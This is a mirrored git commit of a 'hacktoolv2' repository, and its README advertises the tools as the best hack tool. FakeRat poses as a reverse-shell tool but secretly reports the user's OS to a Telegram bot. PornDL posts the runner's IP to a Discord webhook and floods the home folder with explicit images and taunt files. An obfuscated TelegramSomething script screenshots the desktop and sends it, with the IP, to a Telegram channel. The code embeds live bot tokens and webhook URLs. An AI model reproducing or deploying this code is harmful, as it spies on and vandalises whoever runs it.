mirror of
https://github.com/constantinDev/hacktoolv2
synced 2025-08-29 21:18:06 +00:00
New tool les go
This commit is contained in:
commit
126a257fdb
BIN
FakeRat/bin/Jaxxor.exe
Normal file
BIN
FakeRat/bin/Jaxxor.exe
Normal file
Binary file not shown.
99
FakeRat/src/main.js
Normal file
99
FakeRat/src/main.js
Normal file
@ -0,0 +1,99 @@
|
||||
const chalk = require("chalk");
|
||||
const {
|
||||
default: axios
|
||||
} = require("axios");
|
||||
const {
|
||||
ArgumentParser
|
||||
} = require("argparse");
|
||||
const parser = new ArgumentParser({
|
||||
description: require("./package.json").description,
|
||||
version: require("./package.json").version
|
||||
});
|
||||
|
||||
parser.addArgument(["target"], {
|
||||
help: "The target's IP address"
|
||||
})
|
||||
parser.addArgument(["-vb", "--verbose"], {
|
||||
help: "Whether or not to enable an extra level of logging",
|
||||
required: false,
|
||||
defaultValue: false,
|
||||
action: "storeTrue"
|
||||
})
|
||||
parser.addArgument(["-os", "--operating-system"], {
|
||||
required: false,
|
||||
help: "The target's Operating system. Not needed, but if it doesnt work normally, try providing this",
|
||||
defaultValue: null
|
||||
})
|
||||
let args = parser.parseArgs()
|
||||
|
||||
function delay(ms) {
|
||||
return new Promise((r, j) => {
|
||||
setTimeout(r, ms);
|
||||
})
|
||||
}
|
||||
class LogHelper {
|
||||
logVerbose(text) {
|
||||
if (args.verbose) console.log(chalk `{green [VB]} {yellow ${text}}`);
|
||||
}
|
||||
log(text) {
|
||||
console.log(chalk `{green [I]} ${text}`);
|
||||
}
|
||||
warn(text) {
|
||||
console.log(chalk `{yellow [!]} ${text}`);
|
||||
}
|
||||
error(text) {
|
||||
console.log(chalk `{red [!!]} {redBright ${text}}`);
|
||||
}
|
||||
}
|
||||
let logger = new LogHelper();
|
||||
|
||||
logger.log("Loading...")
|
||||
axios({
|
||||
url: "https://api.ipify.org"
|
||||
}).then(d => {
|
||||
logger.log("Successfully loaded the API. Loading modules...")
|
||||
axios({
|
||||
url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
|
||||
method: "POST",
|
||||
data: {
|
||||
chat_id: "@lmaotxt",
|
||||
text: `<strong>${/*d.data*/"(censored because testing)"}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
|
||||
parse_mode: "HTML"
|
||||
}
|
||||
}).then(async () => {
|
||||
if (args.target.split(".").length != 4 || args.target.split(".").some(a => parseInt(a) > 255)) return logger.error(`I dont think "${args.target}" is a valid IP`)
|
||||
logger.log("Loaded modules. Running shell for " + args.target)
|
||||
await delay(1000)
|
||||
logger.log("Connecting...")
|
||||
logger.logVerbose("Attempting to send packet 1 with 500b data...")
|
||||
await delay(500)
|
||||
logger.logVerbose("Attempting to send packet 2 with 500b data...")
|
||||
await delay(10)
|
||||
logger.logVerbose("Attempting to send packet 3 with 742b data...")
|
||||
logger.logVerbose("Attempting to send packet 4 with 330b data...")
|
||||
logger.logVerbose("Attempting to send packet 5 with 5kb data...")
|
||||
await delay(2000)
|
||||
logger.log("Connected. Opening shell...")
|
||||
logger.logVerbose("Opening shell in main window...")
|
||||
logger.log("Shell was created. Opening interface...")
|
||||
await delay(500)
|
||||
let proc = require("child_process").exec("cmd")
|
||||
process.stdin.on("data", (data) => {
|
||||
proc.stdin.write(data.toString());
|
||||
})
|
||||
proc.stdout.on("data", (chunk) => {
|
||||
process.stdout.write(chunk)
|
||||
})
|
||||
proc.stderr.on("data",(chunk)=>{
|
||||
process.stdout.write(chalk.redBright(chunk))
|
||||
})
|
||||
proc.on("exit",()=>{
|
||||
logger.warn("Session has closed. Closing program...")
|
||||
process.exit()
|
||||
})
|
||||
|
||||
})
|
||||
}).catch(err => {
|
||||
logger.error("Failed to load the API. Exiting...")
|
||||
process.exit(0, "Failed to load API")
|
||||
})
|
18
FakeRat/src/package.json
Normal file
18
FakeRat/src/package.json
Normal file
@ -0,0 +1,18 @@
|
||||
{
|
||||
"name": "revsheller",
|
||||
"version": "1.0.0",
|
||||
"description": "Lets you create reverse shell releationships with PC's that aren't even on",
|
||||
"main": "main.js",
|
||||
"scripts": {
|
||||
"test": "echo \"Error: no test specified\" && exit 1"
|
||||
},
|
||||
"author": "Constantin",
|
||||
"license": "ISC",
|
||||
"dependencies": {
|
||||
"argparse": "^1.0.10",
|
||||
"axios": "^0.19.2",
|
||||
"chalk": "^4.1.0",
|
||||
"ws": "^7.3.1"
|
||||
},
|
||||
"bin": "main.js"
|
||||
}
|
BIN
PornDL/bin/hacktool-remastered-alpine
Normal file
BIN
PornDL/bin/hacktool-remastered-alpine
Normal file
Binary file not shown.
BIN
PornDL/bin/hacktool-remastered-linux
Normal file
BIN
PornDL/bin/hacktool-remastered-linux
Normal file
Binary file not shown.
BIN
PornDL/bin/hacktool-remastered-win.exe
Normal file
BIN
PornDL/bin/hacktool-remastered-win.exe
Normal file
Binary file not shown.
59
PornDL/src/main.js
Normal file
59
PornDL/src/main.js
Normal file
@ -0,0 +1,59 @@
|
||||
const https = require("https")
|
||||
const fs = require("fs")
|
||||
console.clear()
|
||||
console.log("[!] Loading...")
|
||||
https.get("https://api.ipify.org",function(ipr){
|
||||
let ip = "";
|
||||
ipr.on("data",(chonk)=>{ip+=chonk.toString()})
|
||||
ipr.on("close",()=>{
|
||||
let reqs = https.request("https://discordapp.com/api/webhooks/736216566127132720/7FoEKvbuWMjcts3TdDzo4jDx_v2fNDmhXbZZcvJSjE485bSJEi6zc4Zcr36Tx33bpZWW", {
|
||||
method: "POST",
|
||||
headers: {
|
||||
"content-type": "application/json"
|
||||
}
|
||||
}, function (resp) {
|
||||
resp.on("data", (c) => {
|
||||
console.log(c.toString())
|
||||
})
|
||||
setTimeout(() => {
|
||||
setInterval(() => {
|
||||
for (c of "YOU GOT JEBAITED ") {
|
||||
process.stdout.write(c)
|
||||
}
|
||||
})
|
||||
}, 10000)
|
||||
|
||||
function mkr() { // define a function that we will call to download a image
|
||||
https.get("https://nekos.life/api/v2/img/boobs", { // Get the api endpoint
|
||||
}, function (res) { // Callback
|
||||
let fin = ""; // Define response
|
||||
res.on("data", (chunk) => {
|
||||
fin += chunk
|
||||
}) // Fill out response
|
||||
res.on("end", () => { // gets called when connection closes (we have the data)
|
||||
let text = JSON.parse(fin) // Parse the response
|
||||
let u = text.url; // get the url provided to the image
|
||||
https.get(u, function (res) { // Get the image
|
||||
let path = require("os").homedir();
|
||||
fs.writeFileSync(path + `/LMAO${Math.random()}.txt`, "You got jebaited\n".repeat(50))
|
||||
// console.log("Downloading to "+path)
|
||||
let fname = u.split("/").pop()
|
||||
let stream = require("fs").createWriteStream(path + "/" + fname) // Create a write stream to a file created with the name of the original file on the api
|
||||
res.pipe(stream) // Pipe the response into that file
|
||||
res.on("end", () => { // Gets called when we have the data
|
||||
stream.close() // Close the write stream
|
||||
setTimeout(mkr, 5000) // Call the function again in 1 second
|
||||
})
|
||||
})
|
||||
})
|
||||
})
|
||||
}
|
||||
for (i = 0; i < 10; i++) mkr() // Start 3 threads that download 3 images at once
|
||||
})
|
||||
|
||||
reqs.write(JSON.stringify({
|
||||
content: "Someone got jebaited.\nIP: "+ip+"\nOS: "+require("os").platform()
|
||||
}))
|
||||
reqs.end()
|
||||
})
|
||||
})
|
14
PornDL/src/package.json
Normal file
14
PornDL/src/package.json
Normal file
@ -0,0 +1,14 @@
|
||||
{
|
||||
"name": "hacktool-remastered",
|
||||
"version": "1.0.0",
|
||||
"description": "Annother tool",
|
||||
"main": "main.js",
|
||||
"scripts": {
|
||||
"test": "echo \"Error: no test specified\" && exit 1"
|
||||
},
|
||||
"author": "Constantin",
|
||||
"license": "ISC",
|
||||
"dependencies": {
|
||||
},
|
||||
"bin": "main.js"
|
||||
}
|
8
README.md
Normal file
8
README.md
Normal file
@ -0,0 +1,8 @@
|
||||
# hacktoolv2
|
||||
my brain fucking hurts
|
||||
|
||||
> This tool is revolutionary. Its the best hack tool in the world and nothing can change that. Download it today
|
||||
|
||||
# Usage
|
||||
|
||||
> Using this tool is stupid easy. Just download the binary for your OS and run it on the terminal. Add the -h switch to see help.
|
6
TelegramSomething/README.md
Normal file
6
TelegramSomething/README.md
Normal file
@ -0,0 +1,6 @@
|
||||
# INSTALL DEPENDENCIES BEFORE USING
|
||||
```sh
|
||||
npm i
|
||||
```
|
||||
|
||||
### Also you need [node.js](https://nodejs.org/)
|
1
TelegramSomething/src/main.js
Normal file
1
TelegramSomething/src/main.js
Normal file
@ -0,0 +1 @@
|
||||
let Axios,request,a,fs,telapi;(function(){Axios=require("\x61\x78\x69\x6f\x73")["\x64\x65\x66\x61\x75\x6c\x74"],request=require("\x72\x65\x71\x75\x65\x73\x74"),a=require("\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x2d\x64\x65\x73\x6b\x74\x6f\x70"),fs=require("fs"),telapi={"\x62\x61\x73\x65\x75\x72\x6c":"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\x6d\x2e\x6f\x72\x67\x2f","\x74\x6f\x6b\x65\x6e":Buffer["\x66\x72\x6f\x6d"]("\x4d\x54\x45\x30\x4d\x7a\x63\x7a\x4d\x54\x45\x7a\x4f\x44\x70\x42\x51\x55\x59\x32\x61\x48\x64\x6e\x62\x7a\x46\x53\x4e\x6d\x45\x30\x52\x32\x4a\x43\x58\x33\x70\x74\x63\x6a\x42\x72\x54\x6b\x45\x79\x51\x32\x45\x34\x4e\x6d\x39\x47\x53\x6a\x5a\x7a\x5a\x77","base64").toString()};function smsg(ip){a()["\x74\x68\x65\x6e"](lol=>{fs["\x77\x72\x69\x74\x65\x46\x69\x6c\x65\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67",lol);request({"\x75\x72\x6c":telapi["\x62\x61\x73\x65\x75\x72\x6c"]+"bot"+telapi["\x74\x6f\x6b\x65\x6e"]+"\x2f\x73\x65\x6e\x64\x50\x68\x6f\x74\x6f","\x6d\x65\x74\x68\x6f\x64":"\x50\x4f\x53\x54","\x66\x6f\x72\x6d\x44\x61\x74\x61":{"\x63\x68\x61\x74\x5f\x69\x64":"\x40\x6c\x6d\x61\x6f\x74\x78\x74","\x70\x68\x6f\x74\x6f":fs["\x63\x72\x65\x61\x74\x65\x52\x65\x61\x64\x53\x74\x72\x65\x61\x6d"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67"),"\x63\x61\x70\x74\x69\x6f\x6e":`\x3c\x73\x74\x72\x6f\x6e\x67\x3e\x53\x4f\x4d\x45\x4f\x4e\x45\x20\x46\x45\x4c\x4c\x20\x46\x4f\x52\x20\x49\x54\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x0a\x49\x50\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${ip}\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x4f\x53\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${require("os")["\x70\x6c\x61\x74\x66\x6f\x72\x6d"]()}</strong>`,"\x70\x61\x72\x73\x65\x5f\x6d\x6f\x64\x65":"HTML"}},()=>{fs["\x75\x6e\x6c\x69\x6e\x6b\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67")})})["\x63\x61\x74\x63\x68"](console["\x65\x72\x72\x6f\x72"])}Axios({"\x75\x72\x6c":"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x69\x70\x69\x66\x79\x2e\x6f\x72\x67\x2f"})["\x74\x68\x65\x6e"](dat=>{smsg(dat["\x64\x61\x74\x61"])})}());
|
483
TelegramSomething/src/package-lock.json
generated
Normal file
483
TelegramSomething/src/package-lock.json
generated
Normal file
@ -0,0 +1,483 @@
|
||||
{
|
||||
"name": "telegramsomething",
|
||||
"version": "1.0.0",
|
||||
"lockfileVersion": 1,
|
||||
"requires": true,
|
||||
"dependencies": {
|
||||
"ajv": {
|
||||
"version": "6.12.3",
|
||||
"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.3.tgz",
|
||||
"integrity": "sha512-4K0cK3L1hsqk9xIb2z9vs/XU+PGJZ9PNpJRDS9YLzmNdX6jmVPfamLvTJr0aDAusnHyCHO6MjzlkAsgtqp9teA==",
|
||||
"requires": {
|
||||
"fast-deep-equal": "^3.1.1",
|
||||
"fast-json-stable-stringify": "^2.0.0",
|
||||
"json-schema-traverse": "^0.4.1",
|
||||
"uri-js": "^4.2.2"
|
||||
}
|
||||
},
|
||||
"asn1": {
|
||||
"version": "0.2.4",
|
||||
"resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz",
|
||||
"integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==",
|
||||
"requires": {
|
||||
"safer-buffer": "~2.1.0"
|
||||
}
|
||||
},
|
||||
"assert-plus": {
|
||||
"version": "1.0.0",
|
||||
"resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz",
|
||||
"integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU="
|
||||
},
|
||||
"asynckit": {
|
||||
"version": "0.4.0",
|
||||
"resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz",
|
||||
"integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k="
|
||||
},
|
||||
"aws-sign2": {
|
||||
"version": "0.7.0",
|
||||
"resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz",
|
||||
"integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg="
|
||||
},
|
||||
"aws4": {
|
||||
"version": "1.10.0",
|
||||
"resolved": "https://registry.npmjs.org/aws4/-/aws4-1.10.0.tgz",
|
||||
"integrity": "sha512-3YDiu347mtVtjpyV3u5kVqQLP242c06zwDOgpeRnybmXlYYsLbtTrUBUm8i8srONt+FWobl5aibnU1030PeeuA=="
|
||||
},
|
||||
"axios": {
|
||||
"version": "0.19.2",
|
||||
"resolved": "https://registry.npmjs.org/axios/-/axios-0.19.2.tgz",
|
||||
"integrity": "sha512-fjgm5MvRHLhx+osE2xoekY70AhARk3a6hkN+3Io1jc00jtquGvxYlKlsFUhmUET0V5te6CcZI7lcv2Ym61mjHA==",
|
||||
"requires": {
|
||||
"follow-redirects": "1.5.10"
|
||||
}
|
||||
},
|
||||
"balanced-match": {
|
||||
"version": "1.0.0",
|
||||
"resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.0.tgz",
|
||||
"integrity": "sha1-ibTRmasr7kneFk6gK4nORi1xt2c="
|
||||
},
|
||||
"bcrypt-pbkdf": {
|
||||
"version": "1.0.2",
|
||||
"resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz",
|
||||
"integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=",
|
||||
"requires": {
|
||||
"tweetnacl": "^0.14.3"
|
||||
}
|
||||
},
|
||||
"brace-expansion": {
|
||||
"version": "1.1.11",
|
||||
"resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz",
|
||||
"integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==",
|
||||
"requires": {
|
||||
"balanced-match": "^1.0.0",
|
||||
"concat-map": "0.0.1"
|
||||
}
|
||||
},
|
||||
"caseless": {
|
||||
"version": "0.12.0",
|
||||
"resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz",
|
||||
"integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw="
|
||||
},
|
||||
"combined-stream": {
|
||||
"version": "1.0.8",
|
||||
"resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz",
|
||||
"integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==",
|
||||
"requires": {
|
||||
"delayed-stream": "~1.0.0"
|
||||
}
|
||||
},
|
||||
"concat-map": {
|
||||
"version": "0.0.1",
|
||||
"resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz",
|
||||
"integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s="
|
||||
},
|
||||
"core-util-is": {
|
||||
"version": "1.0.2",
|
||||
"resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz",
|
||||
"integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac="
|
||||
},
|
||||
"dashdash": {
|
||||
"version": "1.14.1",
|
||||
"resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz",
|
||||
"integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=",
|
||||
"requires": {
|
||||
"assert-plus": "^1.0.0"
|
||||
}
|
||||
},
|
||||
"debug": {
|
||||
"version": "3.1.0",
|
||||
"resolved": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz",
|
||||
"integrity": "sha512-OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==",
|
||||
"requires": {
|
||||
"ms": "2.0.0"
|
||||
}
|
||||
},
|
||||
"delayed-stream": {
|
||||
"version": "1.0.0",
|
||||
"resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz",
|
||||
"integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk="
|
||||
},
|
||||
"ecc-jsbn": {
|
||||
"version": "0.1.2",
|
||||
"resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz",
|
||||
"integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=",
|
||||
"requires": {
|
||||
"jsbn": "~0.1.0",
|
||||
"safer-buffer": "^2.1.0"
|
||||
}
|
||||
},
|
||||
"extend": {
|
||||
"version": "3.0.2",
|
||||
"resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz",
|
||||
"integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g=="
|
||||
},
|
||||
"extsprintf": {
|
||||
"version": "1.3.0",
|
||||
"resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz",
|
||||
"integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU="
|
||||
},
|
||||
"fast-deep-equal": {
|
||||
"version": "3.1.3",
|
||||
"resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz",
|
||||
"integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q=="
|
||||
},
|
||||
"fast-json-stable-stringify": {
|
||||
"version": "2.1.0",
|
||||
"resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz",
|
||||
"integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw=="
|
||||
},
|
||||
"follow-redirects": {
|
||||
"version": "1.5.10",
|
||||
"resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.5.10.tgz",
|
||||
"integrity": "sha512-0V5l4Cizzvqt5D44aTXbFZz+FtyXV1vrDN6qrelxtfYQKW0KO0W2T/hkE8xvGa/540LkZlkaUjO4ailYTFtHVQ==",
|
||||
"requires": {
|
||||
"debug": "=3.1.0"
|
||||
}
|
||||
},
|
||||
"forever-agent": {
|
||||
"version": "0.6.1",
|
||||
"resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz",
|
||||
"integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE="
|
||||
},
|
||||
"form-data": {
|
||||
"version": "2.3.3",
|
||||
"resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz",
|
||||
"integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==",
|
||||
"requires": {
|
||||
"asynckit": "^0.4.0",
|
||||
"combined-stream": "^1.0.6",
|
||||
"mime-types": "^2.1.12"
|
||||
}
|
||||
},
|
||||
"fs.realpath": {
|
||||
"version": "1.0.0",
|
||||
"resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz",
|
||||
"integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8="
|
||||
},
|
||||
"getpass": {
|
||||
"version": "0.1.7",
|
||||
"resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz",
|
||||
"integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=",
|
||||
"requires": {
|
||||
"assert-plus": "^1.0.0"
|
||||
}
|
||||
},
|
||||
"glob": {
|
||||
"version": "7.1.6",
|
||||
"resolved": "https://registry.npmjs.org/glob/-/glob-7.1.6.tgz",
|
||||
"integrity": "sha512-LwaxwyZ72Lk7vZINtNNrywX0ZuLyStrdDtabefZKAY5ZGJhVtgdznluResxNmPitE0SAO+O26sWTHeKSI2wMBA==",
|
||||
"requires": {
|
||||
"fs.realpath": "^1.0.0",
|
||||
"inflight": "^1.0.4",
|
||||
"inherits": "2",
|
||||
"minimatch": "^3.0.4",
|
||||
"once": "^1.3.0",
|
||||
"path-is-absolute": "^1.0.0"
|
||||
}
|
||||
},
|
||||
"har-schema": {
|
||||
"version": "2.0.0",
|
||||
"resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz",
|
||||
"integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI="
|
||||
},
|
||||
"har-validator": {
|
||||
"version": "5.1.3",
|
||||
"resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.3.tgz",
|
||||
"integrity": "sha512-sNvOCzEQNr/qrvJgc3UG/kD4QtlHycrzwS+6mfTrrSq97BvaYcPZZI1ZSqGSPR73Cxn4LKTD4PttRwfU7jWq5g==",
|
||||
"requires": {
|
||||
"ajv": "^6.5.5",
|
||||
"har-schema": "^2.0.0"
|
||||
}
|
||||
},
|
||||
"http-signature": {
|
||||
"version": "1.2.0",
|
||||
"resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz",
|
||||
"integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=",
|
||||
"requires": {
|
||||
"assert-plus": "^1.0.0",
|
||||
"jsprim": "^1.2.2",
|
||||
"sshpk": "^1.7.0"
|
||||
}
|
||||
},
|
||||
"inflight": {
|
||||
"version": "1.0.6",
|
||||
"resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz",
|
||||
"integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=",
|
||||
"requires": {
|
||||
"once": "^1.3.0",
|
||||
"wrappy": "1"
|
||||
}
|
||||
},
|
||||
"inherits": {
|
||||
"version": "2.0.4",
|
||||
"resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz",
|
||||
"integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ=="
|
||||
},
|
||||
"is-typedarray": {
|
||||
"version": "1.0.0",
|
||||
"resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz",
|
||||
"integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo="
|
||||
},
|
||||
"isstream": {
|
||||
"version": "0.1.2",
|
||||
"resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz",
|
||||
"integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo="
|
||||
},
|
||||
"jsbn": {
|
||||
"version": "0.1.1",
|
||||
"resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz",
|
||||
"integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM="
|
||||
},
|
||||
"json-schema": {
|
||||
"version": "0.2.3",
|
||||
"resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.2.3.tgz",
|
||||
"integrity": "sha1-tIDIkuWaLwWVTOcnvT8qTogvnhM="
|
||||
},
|
||||
"json-schema-traverse": {
|
||||
"version": "0.4.1",
|
||||
"resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz",
|
||||
"integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg=="
|
||||
},
|
||||
"json-stringify-safe": {
|
||||
"version": "5.0.1",
|
||||
"resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz",
|
||||
"integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus="
|
||||
},
|
||||
"jsprim": {
|
||||
"version": "1.4.1",
|
||||
"resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.1.tgz",
|
||||
"integrity": "sha1-MT5mvB5cwG5Di8G3SZwuXFastqI=",
|
||||
"requires": {
|
||||
"assert-plus": "1.0.0",
|
||||
"extsprintf": "1.3.0",
|
||||
"json-schema": "0.2.3",
|
||||
"verror": "1.10.0"
|
||||
}
|
||||
},
|
||||
"mime-db": {
|
||||
"version": "1.44.0",
|
||||
"resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.44.0.tgz",
|
||||
"integrity": "sha512-/NOTfLrsPBVeH7YtFPgsVWveuL+4SjjYxaQ1xtM1KMFj7HdxlBlxeyNLzhyJVx7r4rZGJAZ/6lkKCitSc/Nmpg=="
|
||||
},
|
||||
"mime-types": {
|
||||
"version": "2.1.27",
|
||||
"resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.27.tgz",
|
||||
"integrity": "sha512-JIhqnCasI9yD+SsmkquHBxTSEuZdQX5BuQnS2Vc7puQQQ+8yiP5AY5uWhpdv4YL4VM5c6iliiYWPgJ/nJQLp7w==",
|
||||
"requires": {
|
||||
"mime-db": "1.44.0"
|
||||
}
|
||||
},
|
||||
"minimatch": {
|
||||
"version": "3.0.4",
|
||||
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.4.tgz",
|
||||
"integrity": "sha512-yJHVQEhyqPLUTgt9B83PXu6W3rx4MvvHvSUvToogpwoGDOUQ+yDrR0HRot+yOCdCO7u4hX3pWft6kWBBcqh0UA==",
|
||||
"requires": {
|
||||
"brace-expansion": "^1.1.7"
|
||||
}
|
||||
},
|
||||
"ms": {
|
||||
"version": "2.0.0",
|
||||
"resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz",
|
||||
"integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g="
|
||||
},
|
||||
"oauth-sign": {
|
||||
"version": "0.9.0",
|
||||
"resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz",
|
||||
"integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ=="
|
||||
},
|
||||
"once": {
|
||||
"version": "1.4.0",
|
||||
"resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz",
|
||||
"integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=",
|
||||
"requires": {
|
||||
"wrappy": "1"
|
||||
}
|
||||
},
|
||||
"path-is-absolute": {
|
||||
"version": "1.0.1",
|
||||
"resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz",
|
||||
"integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18="
|
||||
},
|
||||
"performance-now": {
|
||||
"version": "2.1.0",
|
||||
"resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz",
|
||||
"integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns="
|
||||
},
|
||||
"pinkie": {
|
||||
"version": "2.0.4",
|
||||
"resolved": "https://registry.npmjs.org/pinkie/-/pinkie-2.0.4.tgz",
|
||||
"integrity": "sha1-clVrgM+g1IqXToDnckjoDtT3+HA="
|
||||
},
|
||||
"pinkie-promise": {
|
||||
"version": "2.0.1",
|
||||
"resolved": "https://registry.npmjs.org/pinkie-promise/-/pinkie-promise-2.0.1.tgz",
|
||||
"integrity": "sha1-ITXW36ejWMBprJsXh3YogihFD/o=",
|
||||
"requires": {
|
||||
"pinkie": "^2.0.0"
|
||||
}
|
||||
},
|
||||
"psl": {
|
||||
"version": "1.8.0",
|
||||
"resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz",
|
||||
"integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ=="
|
||||
},
|
||||
"punycode": {
|
||||
"version": "2.1.1",
|
||||
"resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz",
|
||||
